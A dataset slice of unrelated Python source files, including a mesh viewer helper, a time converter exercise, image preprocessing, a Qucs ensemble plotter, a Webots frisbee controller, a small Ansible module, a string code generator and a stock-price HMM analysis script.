return_id=False):\n if not plot:\n view = Viewer(shading)\n else:\n view = plot\n view.reset()\n obj_id = view.add_mesh(v, f, c, uv=uv, shading=shading)\n if not plot:\n view.launch()\n\n #if return_plot and return_id:\n # return view, obj_id\n if return_plot:# and not return_id:\n return view\n\ndef subplot(v, f, c=None, uv=None, shading={}, s=[1, 1, 0], data=None):\n shading[\"width\"] = 400\n shading[\"height\"] = 400\n view = Viewer(shading)\n view.add_mesh(v, f, c, uv=uv, shading=shading)\n if data == None:\n rows = []\n else:\n rows = data\n if s[0] != 1 or s[1] != 1:\n if data == None: # Intialize subplot array\n cnt = 0\n for r in range(s[0]):\n row = []\n for c in range(s[1]):\n row.append(Output())\n cnt += 1\n rows.append(row)\n \n for r in rows:\n display(HBox(r))\n\n out = rows[int(s[2]/s[1])][s[2]%s[1]]\n with out:\n display(view._renderer)\n rows[int(s[2]/s[1])][s[2]%s[1]] = view\n if data == None:\n return rows\n","sub_path":"tutorial/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":16661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"165294947","text":"def time_converter(time):\n if time == \"00:00\":\n return \"12:00 a.m.\"\n t = time.split(\":\")\n res = \"\"\n if int(t[0]) > 12:\n res += str(int(t[0]) % (12 + 1) + 1)\n else:\n res += str(int(t[0]))\n res += \":\"\n res += t[1]\n res += \" \"\n if int(t[0]) > 11:\n res += \"p.m.\"\n else:\n res += \"a.m.\"\n #print(res)\n return res\n\nif __name__ == '__main__':\n print(\"Example:\")\n print(time_converter('12:30'))\n\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert time_converter('12:30') == '12:30 p.m.'\n assert time_converter('09:00') == '9:00 a.m.'\n assert time_converter('23:15') == '11:15 p.m.'\n print(\"Coding complete? 
Click 'Check' to earn cool rewards!\")\n","sub_path":"Home/Time Converter (24h to 12h)/mission.py","file_name":"mission.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"541777125","text":"############################################################\r\n# This file is for to preprocess images from Planet Lab #\r\n# to convert them from 4 bands to 3 bands and crop them to #\r\n# a fixed size #\r\n############################################################\r\n\r\nimport json\r\nimport numpy as np\r\nimport sys\r\nimport csv\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\nimport os\r\nfrom collections import defaultdict \r\n\r\nprint('Start Processing')\r\ndef process_mask(masks_dir, masks_out):\r\n masks_filenames = [f for f in os.listdir(masks_dir)]\r\n for mask in masks_filenames:\r\n image_id = mask.split('.')[0] #get image ID\r\n im_name = image_id + '.png'\r\n mask_image = Image.open(masks_dir + im_name)\r\n mask_image.load()\r\n background = mask_image.crop((0, 0, cut_size, cut_size)) \r\n # save mask\r\n overlay_path = masks_out + image_id + '.png'\r\n background.save(overlay_path, 'png', quality=100)\r\n \r\ndef process_image(imgs_dir, imgs_out):\r\n imgs_filenames = [f for f in os.listdir(imgs_dir)]\r\n for img_file in imgs_filenames:\r\n image_id = img_file.split('.')[0] #get image ID\r\n im_name = image_id + '.tif'\r\n rgba_image = Image.open(imgs_dir + im_name)\r\n #turn to RGB\r\n rgba_image.load()\r\n background = Image.new(\"RGB\", rgba_image.size, (255, 255, 255))\r\n background.paste(rgba_image, mask = rgba_image.split()[3])\r\n #crop to a unanimous size\r\n background = background.crop((0, 0, cut_size, cut_size)) \r\n #save image\r\n overlay_path = imgs_out + image_id + '.jpeg'\r\n background.save(overlay_path, 'JPEG', quality=100)\r\n\r\n\r\nimgs_dir = 'data/imgs_planet/'\r\nmasks_dir = 'data/masks_planet/'\r\nimgs_out = 'data/imgs/'\r\nmasks_out = 'data/masks/'\r\ncut_size = 467\r\n\r\n# comment out the function if don't want to process the images or the masks \r\nprocess_image(imgs_dir, imgs_out)\r\nprocess_mask(masks_dir, masks_out)\r\n \r\n","sub_path":"train_preprocess.py","file_name":"train_preprocess.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"362110967","text":"#! 
/usr/bin/env python\n\nimport sys\nimport yaml\nimport argparse\nimport numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport qucstools.qucs.netlist as netlist\nimport qucstools.qucs.generators as generators\nimport qucstools.qucs.simulator as simulator\n\nimport qucstools.extensions.arg as apext\n\n\ndef main(argv=sys.argv):\n # parse arguments\n parser = argparse.ArgumentParser(\n description=\"Plot function ensembles out of randomized netlists\",\n epilog=\"Montecarlo analysis with Qucs\"\n )\n parser.add_argument(\n 'netlist', metavar=\"NETLIST\", type=argparse.FileType('r'),\n action=apext.make_custom_action(netlist.load),\n help=\"Netlist to be used\"\n )\n parser.add_argument(\n 'setup', metavar=\"SETUP\", type=argparse.FileType('r'),\n action=apext.make_custom_action(yaml.load),\n help=\"Analysis setup\"\n )\n args = parser.parse_args(argv)\n\n # randomize components\n generated_netlists = generators.randomize(\n args.netlist, **args.setup['randomization']\n )\n\n # simulate netlists\n datasets = simulator.simulate(\n generated_netlists, **args.setup['simulation']\n )\n\n # plot observations\n for observation in args.setup['observations']:\n function_name = observation['function']\n variable_name = observation['variable']\n\n # get base domain values\n base_dataset = datasets[0]\n base_function = base_dataset[function_name]\n base_variable = np.unique(base_function.domain[variable_name])\n points = np.repeat(\n base_function.domain[0], (base_variable.shape[0], 1)\n )\n points[variable_name] = base_variable\n\n # plot ensemble\n plt.figure()\n plt.hold(True)\n plt.title(\n \"Ensemble for {} = f({})\".format(function_name, variable_name))\n for dataset in datasets:\n plt.semilogx(points, np.abs(dataset[function_name](points)))\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"qucstools/tools/qensemble.py","file_name":"qensemble.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"393884667","text":"from distutils.core import setup\nimport os\n\ndef getfile(fname):\n return open(os.path.join(os.path.dirname(__file__), fname))\n\nreadme = getfile('README.txt').read()\n\nsetup(name='fpath',\n version='0.6',\n description='Filesystem paths as objects',\n author='Wendell',\n author_email='wackywendell@gmail.com',\n py_modules=['fpath'],\n classifiers=[ # available at http://pypi.python.org/pypi?%3Aaction=list_classifiers\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: System :: Filesystems',\n 'Operating System :: POSIX',\n 'Operating System :: Microsoft',\n 'License :: OSI Approved :: MIT License'\n ],\n license='MIT',\n long_description=readme\n )\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"287513796","text":"\"\"\"frisbee_flight controller.\"\"\"\n\n# importing the Supervisor module\nfrom controller import Robot\nfrom controller import Supervisor\nimport numpy as np\n\n# create the Supervisor instance.\nsupervisor = Supervisor()\n\n# get the time step of the current world.\ntimestep = int(supervisor.getBasicTimeStep())\nprint(timestep)\n\n# instantiate object handles for the frisbee\nfrisbee_node = supervisor.getFromDef(\"test_frisbee\")\ntrans_field = frisbee_node.getField(\"translation\")\nrotation_field = 
frisbee_node.getField(\"rotation\")\n\n# import the frisbee simulation data\ndata = np.genfromtxt(\"trajectory.csv\", delimiter=',')\nposition_data = data[:,0:3]\nrotation_data = np.genfromtxt(\"rotations.csv\", delimiter=',')\n\ntime_index = 0\nread = False\n# Main loop:\n# - perform simulation steps until Webots is stopping the controller\nwhile supervisor.step(timestep) != -1:\n # this is done repeatedly\n try:\n if read:\n # update the position and rotation of the frisbee\n position = position_data[time_index,:].tolist()\n trans_field.setSFVec3f(position)\n \n rotation = rotation_data[time_index,:].tolist()\n rotation_field.setSFRotation(rotation)\n \n time_index += 1\n except(IndexError):\n print(\"End of trajectory file reached\")\n read = False\n pass\n\n\n\n# Enter here exit cleanup code.\n","sub_path":"183DASimul/controllers/frisbee_controller/___/frisbee_controller_old.py","file_name":"frisbee_controller_old.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"34043519","text":"#!/usr/bin/env python\nfrom ansible.module_utils.basic import *\n\nclass Linux(object):\n\tplatform = 'Generic'\n\tdistribution = None\n \n\tdef __new__(cls, *args, **kwargs):\n\t\treturn load_platform_subclass(Linux, args, kwargs)\n \n\tdef name(self):\n\t\treturn self.distribution if self.distribution else self.platform\n\nclass Debian(Linux):\n\tplatform = 'Linux'\n\tdistribution = 'Debian'\n\nclass OSX(Linux):\n\tplatform = 'Darwin'\n\tdistribution = None\n\nmodule = AnsibleModule(\n\targument_spec = dict(\n\t\tcommand = dict(required=True)\n\t)\n)\nmodule.log(\"start\")\nlinux = Linux()\n\ncommand = module.params['command']\nrc, stdout, stderr = module.run_command(command)\nmodule.exit_json(\n\tchanged=True,\n\trc=rc,\n\tstdout=stdout,\n\tstderr=stderr, msg=linux.name()\n)\nmodule.log(\"end\")\n","sub_path":"ansible/library/sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"589058478","text":"import collections\nimport string\n\n\nclass StringGenerator:\n\n letters = string.ascii_letters\n first_letter = letters[0]\n last_letter = letters[-1]\n _codes = collections.defaultdict(str)\n\n @classmethod\n def increase_letter(cls, letter):\n if letter == cls.last_letter:\n return cls.first_letter\n\n index = cls.letters.index(letter)\n return cls.letters[index + 1]\n\n @classmethod\n def increase_code(cls, code):\n \"\"\"\n\n >>> StringGenerator.increase_code('c')\n 'd'\n >>> StringGenerator.increase_code('b')\n 'c'\n >>> StringGenerator.increase_code('z')\n 'A'\n >>> StringGenerator.increase_code('aZ')\n 'ba'\n >>> StringGenerator.increase_code('ZZ')\n 'aaa'\n\n :param code: string code, that contains only letters.\n :return:\n \"\"\"\n reverse_code = list(code[::-1])\n\n for idx, letter in enumerate(reverse_code):\n new_letter = cls.increase_letter(letter)\n reverse_code[idx] = new_letter\n\n if new_letter != cls.first_letter:\n break\n else:\n reverse_code += cls.first_letter\n return ''.join(reverse_code[::-1])\n\n @classmethod\n def next(cls, prefix):\n \"\"\"Returns next letter added to string gathered from prefix.\n\n >>> StringGenerator.next('prefix1')\n 'a'\n >>> StringGenerator.next('prefix1')\n 'b'\n >>> StringGenerator.next('prefix1')\n 'c'\n >>> StringGenerator.next('prefix2')\n 'a'\n >>> StringGenerator.next('prefix2')\n 'b'\n >>> StringGenerator.next('prefix1')\n 'd'\n\n 
When the generator gets to 'z', the next code returned will be 'aa'.\n\n        :param prefix: unique string\n        :return: new code\n        \"\"\"\n        if prefix not in cls._codes:\n            cls._codes[prefix] = cls.first_letter\n        else:\n            cls._codes[prefix] = cls.increase_code(cls._codes[prefix])\n\n        return cls._codes[prefix]\n\n    @classmethod\n    def delete(cls, prefix):\n        \"\"\"Removes the code stored for the given prefix.\n\n        :param prefix:\n        :return:\n        \"\"\"\n        cls._codes.pop(prefix, None)\n\n    @classmethod\n    def clear(cls):\n        cls._codes.clear()\n\n\nif __name__ == \"__main__\":\n    import doctest\n    doctest.testmod()\n","sub_path":"diskcollections/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"211122723","text":"\n#client = MongoClient()\n#database = client['okcoindb']\n#collection = database['historical_data']\n\n# Retrieve price, v_ask, and v_bid data points from the database.\n\n# DO THE REST OF JAN HAVE TO DELETE ROW\n\nfrom scipy.signal import argrelextrema\n\nimport pandas as pd\nimport yfinance 
as yf\nimport time\nfrom pandas_datareader import data as pdr\n\n\nyf.pdr_override() \n\nimport math \nimport numpy as np\n#import matplotlib.pyplot as plt\n#import seaborn as sns\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom tqdm import tqdm\nimport statistics\nimport numpy as np\nfrom numpy.linalg import norm\nfrom sklearn import linear_model\nfrom sklearn.cluster import KMeans\n\nimport statsmodels.api as sm\nfrom scipy import stats\nfrom matplotlib import cm, pyplot as plt\nfrom hmmlearn.hmm import GaussianHMM\nimport scipy\nimport datetime\nimport json\nimport seaborn as sns\nfrom sklearn.externals import joblib\nimport ta\n\n\n\nticker = [\n# S AND P 500\n\n'ROST',\t\n'RCL',\n'SPGI',\t\n'CRM',\n'SBAC',\t\n'SLB',\t\n'STX',\t\n'SEE',\t\n'SRE',\t\n'NOW',\t\n'SHW',\t\n'SPG',\t\n'SWKS',\t\n'SLG',\n'SNA',\t\n'SO',\t\n'LUV',\t\n'SWK',\t\n'SBUX',\t\n'STT',\t\n'STE',\t\n'SYK',\t\n'SIVB',\t\n'SYF',\t\n'SNPS',\t\t\n'SYY',\n'TMUS',\t\t\n'TROW',\t\n'TTWO',\t\n'TPR',\n'TGT',\n'TEL',\t\n'FTI',\t\n'TFX',\n'TXN',\t\n'TXT',\t\n'TMO',\t\n'TIF',\t\t\n'TJX',\t\n'TSCO',\n'TDG',\t\n'TRV',\t\n'TWTR',\t\n'TSN',\t\n'UDR',\t\n'ULTA',\t\n'USB',\n'UAA',\t\t\t\n'UA',\t\n'UNP',\t\n'UAL',\t\n'UNH',\t\n'UPS',\t\n'URI',\t\t\n'UTX',\t\n'UHS',\t\n'UNM',\t\n'VFC',\t\n'VLO',\n'VAR',\t\n'VTR',\n'VRSN',\t\n'VRSK',\n'VZ',\t\n'V',\n'VNO',\t \n'VMC',\t\n'WRB',\t\n'WAB',\t\n'WMT',\t\n'WBA',\t\n'DIS',\t\n'WM',\t\n'WAT',\t\n'WEC',\t\n'WFC',\t\n'WELL',\n'WDC',\n'WU',\t\n'W',\n'WY',\t\t\n'WHR',\t\n'WMB',\t\n'WLTW',\t\n'WYNN',\t\n'XEL',\n'XRX',\t\n'XLNX',\n'XYL',\n'YUM',\t\n'ZBRA',\t\n'ZBH',\t\n'ZION',\t\n'ZTS',\n\n]\n\n\ndef get_best_hmm_model(X, max_states, max_iter = 10000):\n best_score = -(10 ** 10)\n best_state = 0\n \n for state in range(1, max_states + 1):\n hmm_model = GaussianHMM(n_components = state, random_state = 100,\n covariance_type = \"diag\", n_iter = max_iter).fit(X)\n if hmm_model.score(X) > best_score:\n best_score = hmm_model.score(X)\n best_state = state\n \n best_model = GaussianHMM(n_components = best_state, random_state = 100,\n covariance_type = \"diag\", n_iter = max_iter).fit(X)\n return best_model\n\n# Normalized st. 
deviation\ndef std_normalized(vals):\n    return np.std(vals) / np.mean(vals)\n\n# Ratio of diff between last price and mean value to last price\ndef ma_ratio(vals):\n    return (vals[-1] - np.mean(vals)) / vals[-1]\n\n# z-score for volumes and price\ndef values_deviation(vals):\n    return (vals[-1] - np.mean(vals)) / np.std(vals)\n\n# General plots of hidden states\ndef plot_hidden_states(hmm_model, data, X, column_price):\n    plt.figure(figsize=(15, 15))\n    fig, axs = plt.subplots(hmm_model.n_components, 3, figsize = (15, 15))\n    colours = cm.prism(np.linspace(0, 1, hmm_model.n_components))\n    hidden_states = hmm_model.predict(X)\n\n    for i, (ax, colour) in enumerate(zip(axs, colours)):\n        mask = hidden_states == i\n        ax[0].plot(data.index, data[column_price], c = 'grey')\n        ax[0].plot(data.index[mask], data[column_price][mask], '.', c = colour)\n        ax[0].set_title(\"{0}th hidden state\".format(i))\n        ax[0].grid(True)\n\n        ax[1].hist(data[\"future_return\"][mask], bins = 30)\n        ax[1].set_xlim([-0.1, 0.1])\n        ax[1].set_title(\"future return distribution at {0}th hidden state\".format(i))\n        ax[1].grid(True)\n\n        ax[2].plot(data[\"future_return\"][mask].cumsum(), c = colour)\n        ax[2].set_title(\"cumulative future return at {0}th hidden state\".format(i))\n        ax[2].grid(True)\n\n    plt.tight_layout()\n\n\ndef mean_confidence_interval(vals, confidence):\n    a = 1.0 * np.array(vals)\n    n = len(a)\n    m, se = np.mean(a), scipy.stats.sem(a)\n    h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n    return m - h, m, m + h\n\ndef compare_hidden_states(hmm_model, cols_features, conf_interval, iters = 1000):\n    plt.figure(figsize=(15, 15))\n    fig, axs = plt.subplots(len(cols_features), hmm_model.n_components, figsize = (15, 15))\n    colours = cm.prism(np.linspace(0, 1, hmm_model.n_components))\n\n    for i in range(0, hmm_model.n_components):\n        mc_df = pd.DataFrame()\n\n        # Samples generation\n        for j in range(0, iters):\n            row = np.transpose(hmm_model._generate_sample_from_state(i))\n            mc_df = mc_df.append(pd.DataFrame(row).T)\n        mc_df.columns = cols_features\n\n        for k in range(0, len(mc_df.columns)):\n            axs[k][i].hist(mc_df[cols_features[k]], color = colours[i])\n            axs[k][i].set_title(cols_features[k] + \" (state \" + str(i) + \"): \" + str(np.round(mean_confidence_interval(mc_df[cols_features[k]], conf_interval), 3)))\n            axs[k][i].grid(True)\n\n    plt.tight_layout()\n\n\n\n\n\n\n\n\nfor x in ticker:\n    print(x)\n\n    #datayahoo = pdr.get_data_yahoo(x, period = \"7d\", interval = \"1m\")\n    datayahoo = pdr.get_data_yahoo(x, interval = \"1d\", start=\"1950-07-15\", end=\"2019-12-25\")\n\n    datayahoo = datayahoo.reset_index()\n\n    #datayahoo = datayahoo[:-10]\n\n    #print(datayahoo) \n\n\n    datayahooopen = datayahoo['Open'].values.tolist()\n    datayahoohigh = datayahoo['High'].values.tolist() \n    datayahoolow = datayahoo['Low'].values.tolist()\n    datayahooclose = datayahoo['Close'].values.tolist()\n    datayahoovolume = datayahoo['Volume'].values.tolist()\n\n    data = pd.DataFrame(columns= ['Open', 'High', 'Low', 'Close', 'Volume'])\n\n\n    #data['Timestamp'] = bdate + datayahoodate\n    data['Open'] = datayahooopen\n    data['High'] = datayahoohigh\n    data['Low'] = datayahoolow\n    data['Close'] = datayahooclose\n    data['Volume'] = datayahoovolume\n\n\n    price = data['Close']\n\n    #data['Timestamp'] = pd.to_datetime(data['Timestamp'])\n    data = data.drop_duplicates()\n\n\n    price = price * 100000\n\n    #price = price[:-24] \n\n\n\n    max_idx = list(argrelextrema(price.values, np.greater, order=1)[0])\n    min_idx = list(argrelextrema(price.values, np.less, order=1)[0]) \n\n    idx = 
max_idx + min_idx\n\n\n    idx.sort()\n\n    current_idx = idx + [len(price.values) - 1] \n\n    current_pat = price.values[current_idx]\n\n    start = min(current_idx)\n    end = max(current_idx)\n\n    list_of_values = current_pat.tolist()\n\n    df = pd.DataFrame({'Price':list_of_values})\n\n    df1 = df\n\n    try:\n        model = get_best_hmm_model(X = df1, max_states = 10, max_iter = 1000000)\n    except Exception as exc:\n        # fitting can fail (e.g. degenerate means/weights); skip this ticker\n        # rather than fall through with `model` undefined or stale\n        print('HMM fit failed for {0}: {1}'.format(x, exc))\n        continue\n\n    print(\"Best model with {0} states \".format(str(model.n_components)))\n\n\n    predictionDataset = df.iloc[-1:]\n\n    prediction = model.predict(predictionDataset)\n\n    # LOGIC SHORT WHEN 0; NO POSITION WHEN 1; LONG WHEN 2;\n    print(x)\n    #print(len(prediction))\n    print(sum(prediction))\n\n\n\n\n    datasetINDICATORS = pd.DataFrame(columns= ['Open', 'High', 'Low', 'Close', 'Volume'])\n\n    #datasetINDICATORS['Timestamp'] = data['Datetime']\n    datasetINDICATORS['Open'] = data['Open']\n    datasetINDICATORS['High'] = data['High']\n    datasetINDICATORS['Low'] = data['Low']\n    datasetINDICATORS['Close'] = data['Close']\n    datasetINDICATORS['Volume'] = data['Volume']\n\n    # Add all ta features\n    datasetINDICATORS = ta.add_all_ta_features(\n        datasetINDICATORS, open=\"Open\", high=\"High\", low=\"Low\", close=\"Close\", volume=\"Volume\"\n    )\n\n\n\n    dataset = pd.DataFrame(columns= ['High', 'Low', 'Mid', 'Last', 'Volume']) #'Bid', 'Ask', \n\n    dataset['Mid'] = datayahooopen\n    dataset['High'] = datayahoohigh\n    dataset['Low'] = datayahoolow\n    dataset['Last'] = datayahooclose\n    dataset['Volume'] = datayahoovolume\n\n    dataset = dataset.drop_duplicates()\n\n    # Feature params\n    future_period = 6\n    std_period = 10\n    ma_period = 10\n    price_deviation_period = 10\n    volume_deviation_period = 10\n    column_price = 'Last'\n    column_high = 'High'\n    column_low = 'Low'\n    column_volume = 'Volume'\n\n\n    # Create features\n    ### CHANGES\n    cols_features = [\n\n        'last_return', \n        #'std_normalized',\n        #'ma_ratio', \n        #'price_deviation',\n        #'volume_deviation',\n\n        #'volume_obv',\n        #'volume_cmf',\n        #'volume_fi', MAYBE\n        #'volume_em',\n        #'volume_sma_em',\n        #'volume_vpt',\n        #'volume_nvi',\n        'volatility_atr',\n        #'volatility_bbm',\n        #'volatility_bbh',\n        #'volatility_bbl',\n        #'volatility_bbw',\n        #'volatility_kcc',\n        #'volatility_kch',\n        #'volatility_kcl',\n        #'volatility_dcl',\n        #'volatility_dch',\n        #'volatility_dchi',\n        #'volatility_dcli',\n        'trend_macd',\n        #'trend_macd_signal',\n        #'trend_macd_diff',\n        #'trend_ema_fast',\n        #'trend_ema_slow',\n        #'trend_adx',\n        #'trend_adx_pos',\n        #'trend_adx_neg',\n        #'trend_vortex_ind_pos', \n        #'trend_vortex_ind_neg',\n        #'trend_vortex_ind_diff',\n        #'trend_trix',\n        #'trend_mass_index',\n        #'trend_cci', MAYBE\n        #'trend_dpo', \n        #'trend_kst', \n        #'trend_kst_sig',\n        #'trend_kst_diff', \n        #'trend_ichimoku_a', \n        #'trend_ichimoku_b',\n        #'trend_visual_ichimoku_a', \n        #'trend_visual_ichimoku_b',\n        #'trend_aroon_up',\n        #'trend_aroon_down', \n        #'trend_aroon_ind',\n\n        #'trend_psar', \n        #'trend_psar_up',\n        #'trend_psar_down', \n        #'trend_psar_up_indicator', \n        #'trend_psar_down_indicator',\n        #'momentum_rsi',\n        #'momentum_mfi', MAYBE\n        #'momentum_tsi', \n        #'momentum_uo', \n        'momentum_stoch',\n        #'momentum_stoch_signal', \n        #'momentum_wr',\n        #'momentum_ao',\n        #'momentum_kama',\n        #'momentum_roc', \n        #'others_dr', \n        #'others_dlr', \n        #'others_cr', \n\n\n    ]\n\n\n\n\n\n    # Create features\n    ### CHANGES\n    cols_features_custom = [\n\n        'last_return', \n        #'std_normalized',\n        #'ma_ratio', \n        #'price_deviation',\n        #'volume_deviation',\n\n        'volume_obv',\n        #'volume_cmf',\n        #'volume_fi', MAYBE\n        #'volume_em',\n        #'volume_sma_em',\n        #'volume_vpt',\n
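        # (the remaining commented-out entries are candidate features kept for experimentation)\n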
        #'volume_nvi',\n        #'volatility_atr',\n        'volatility_bbm',\n        'volatility_bbh',\n        'volatility_bbl',\n        #'volatility_bbw',\n        #'volatility_kcc',\n        #'volatility_kch',\n        #'volatility_kcl',\n        #'volatility_dcl',\n        #'volatility_dch',\n        #'volatility_dchi',\n        #'volatility_dcli',\n        #'trend_macd',\n        #'trend_macd_signal',\n        #'trend_macd_diff',\n        #'trend_ema_fast',\n        #'trend_ema_slow',\n        #'trend_adx',\n        #'trend_adx_pos',\n        #'trend_adx_neg',\n        #'trend_vortex_ind_pos', \n        #'trend_vortex_ind_neg',\n        #'trend_vortex_ind_diff',\n        #'trend_trix',\n        #'trend_mass_index',\n        #'trend_cci', MAYBE\n        #'trend_dpo', \n        #'trend_kst', \n        #'trend_kst_sig',\n        #'trend_kst_diff', \n        'trend_ichimoku_a', \n        'trend_ichimoku_b',\n        #'trend_visual_ichimoku_a', \n        #'trend_visual_ichimoku_b',\n        #'trend_aroon_up',\n        #'trend_aroon_down', \n        #'trend_aroon_ind',\n\n        #'trend_psar', \n        #'trend_psar_up',\n        #'trend_psar_down', \n        #'trend_psar_up_indicator', \n        #'trend_psar_down_indicator',\n        'momentum_rsi',\n        #'momentum_mfi', MAYBE\n        #'momentum_tsi', \n        #'momentum_uo', \n        #'momentum_stoch',\n        #'momentum_stoch_signal', \n        #'momentum_wr',\n        #'momentum_ao',\n        #'momentum_kama',\n        #'momentum_roc', \n        #'others_dr', \n        #'others_dlr', \n        #'others_cr', \n\n\n    ]\n\n\n\n\n\n\n    dataset['last_return'] = dataset[column_price].pct_change()\n    dataset['std_normalized'] = dataset[column_price].rolling(std_period).apply(std_normalized)\n    #dataset['ma_ratio'] = dataset[column_price].rolling(std_period).apply(ma_ratio) \n    dataset['ma_ratio'] = dataset['Last']\n    dataset['price_deviation'] = dataset['High'] - dataset['Low']\n    dataset['volume_deviation'] = dataset['Volume']\n\n    # classic floor-trader pivot levels (R1/S1, R2/S2, R3/S3)\n    dataset[\"pivot_point\"] = (dataset['High'] + dataset['Low'] + dataset['Last']) / 3\n    dataset[\"pivH1\"] = (2 * dataset[\"pivot_point\"]) - dataset['Low']\n    dataset[\"pivL1\"] = (2 * dataset[\"pivot_point\"]) - dataset['High']\n    dataset[\"pivH2\"] = dataset[\"pivot_point\"] + (dataset['High'] - dataset['Low'])\n    dataset[\"pivL2\"] = dataset[\"pivot_point\"] - (dataset['High'] - dataset['Low'])\n    dataset[\"pivH3\"] = dataset[\"High\"] + 2 * (dataset[\"pivot_point\"] - dataset['Low'])\n    dataset[\"pivL3\"] = dataset[\"Low\"] - 2 * (dataset[\"High\"] - dataset[\"pivot_point\"])\n\n\n    dataset['volume_obv'] = datasetINDICATORS['volume_obv']\n    dataset['volume_cmf'] = datasetINDICATORS['volume_cmf']\n    dataset['volume_fi'] = datasetINDICATORS['volume_fi']\n    dataset['volume_em'] = datasetINDICATORS['volume_em']\n    dataset['volume_sma_em'] = datasetINDICATORS['volume_sma_em']\n    dataset['volume_vpt'] = datasetINDICATORS['volume_vpt']\n    dataset['volume_nvi'] = datasetINDICATORS['volume_nvi']\n    dataset['volatility_atr'] = datasetINDICATORS['volatility_atr']\n    dataset['volatility_bbm'] = datasetINDICATORS['volatility_bbm']\n    dataset['volatility_bbh'] = datasetINDICATORS['volatility_bbh']\n    dataset['volatility_bbl'] = datasetINDICATORS['volatility_bbl']\n    dataset['volatility_bbw'] = datasetINDICATORS['volatility_bbw']\n    dataset['volatility_kcc'] = datasetINDICATORS['volatility_kcc']\n    dataset['volatility_kch'] = datasetINDICATORS['volatility_kch']\n    dataset['volatility_kcl'] = datasetINDICATORS['volatility_kcl']\n    dataset['volatility_dcl'] = datasetINDICATORS['volatility_dcl']\n    dataset['volatility_dch'] = datasetINDICATORS['volatility_dch']\n    dataset['volatility_dchi'] = datasetINDICATORS['volatility_dchi']\n    dataset['volatility_dcli'] = datasetINDICATORS['volatility_dcli']\n    dataset['trend_macd'] = datasetINDICATORS['trend_macd']\n    dataset['trend_macd_signal'] = datasetINDICATORS['trend_macd_signal']\n
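    # (bulk copy continues: the remaining trend and momentum indicator columns from the ta library)\n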
dataset['trend_macd_diff'] = datasetINDICATORS['trend_macd_diff']\n dataset['trend_ema_fast'] = datasetINDICATORS['trend_ema_fast']\n dataset['trend_ema_slow'] = datasetINDICATORS['trend_ema_slow']\n dataset['trend_adx'] = datasetINDICATORS['trend_adx']\n dataset['trend_adx_pos'] = datasetINDICATORS['trend_adx_pos']\n dataset['trend_adx_neg'] = datasetINDICATORS['trend_adx_neg']\n dataset['trend_vortex_ind_pos'] = datasetINDICATORS['trend_vortex_ind_pos'] \n dataset['trend_vortex_ind_neg'] = datasetINDICATORS['trend_vortex_ind_neg']\n dataset['trend_vortex_ind_diff'] = datasetINDICATORS['trend_vortex_ind_diff']\n dataset['trend_trix'] = datasetINDICATORS['trend_trix']\n dataset['trend_mass_index'] = datasetINDICATORS['trend_mass_index']\n dataset['trend_cci'] = datasetINDICATORS['trend_cci']\n dataset['trend_dpo'] = datasetINDICATORS['trend_dpo'] \n dataset['trend_kst'] = datasetINDICATORS['trend_kst'] \n dataset['trend_kst_sig'] = datasetINDICATORS['trend_kst_sig']\n dataset['trend_kst_diff'] = datasetINDICATORS['trend_kst_diff']\n dataset['trend_ichimoku_a'] = datasetINDICATORS['trend_ichimoku_a'] \n dataset['trend_ichimoku_b'] = datasetINDICATORS['trend_ichimoku_b']\n dataset['trend_visual_ichimoku_a'] = datasetINDICATORS['trend_visual_ichimoku_a'] \n dataset['trend_visual_ichimoku_b'] = datasetINDICATORS['trend_visual_ichimoku_b'] \n dataset['trend_aroon_up'] = datasetINDICATORS['trend_aroon_up']\n dataset['trend_aroon_down'] = datasetINDICATORS['trend_aroon_down'] \n dataset['trend_aroon_ind'] = datasetINDICATORS['trend_aroon_ind'] \n dataset['momentum_rsi'] = datasetINDICATORS['momentum_rsi']\n dataset['momentum_mfi'] = datasetINDICATORS['momentum_mfi']\n dataset['momentum_tsi'] = datasetINDICATORS['momentum_tsi'] \n dataset['momentum_uo'] = datasetINDICATORS['momentum_uo']\n dataset['momentum_stoch'] = datasetINDICATORS['momentum_stoch']\n dataset['momentum_stoch_signal'] = datasetINDICATORS['momentum_stoch_signal'] \n dataset['momentum_wr'] = datasetINDICATORS['momentum_wr']\n dataset['momentum_ao'] = datasetINDICATORS['momentum_ao']\n dataset['momentum_kama'] = datasetINDICATORS['momentum_kama']\n dataset['momentum_roc'] = datasetINDICATORS['momentum_roc'] \n dataset['others_dr'] = datasetINDICATORS['others_dr'] \n dataset['others_dlr'] = datasetINDICATORS['others_dlr'] \n dataset['others_cr'] = datasetINDICATORS['others_cr'] \n\n\n dataset[\"future_return\"] = dataset[column_price].pct_change(future_period).shift(-future_period)\n \n\n dataset = dataset.replace([np.inf, -np.inf], np.nan)\n\n train_set = dataset[cols_features]\n\n train_set = train_set.dropna()\n\n # Add the features we want to use\n\n dataset['close/pivH1'] = dataset['Last'] / dataset['pivH1']\n dataset['close/pivL1'] = dataset['Last'] / 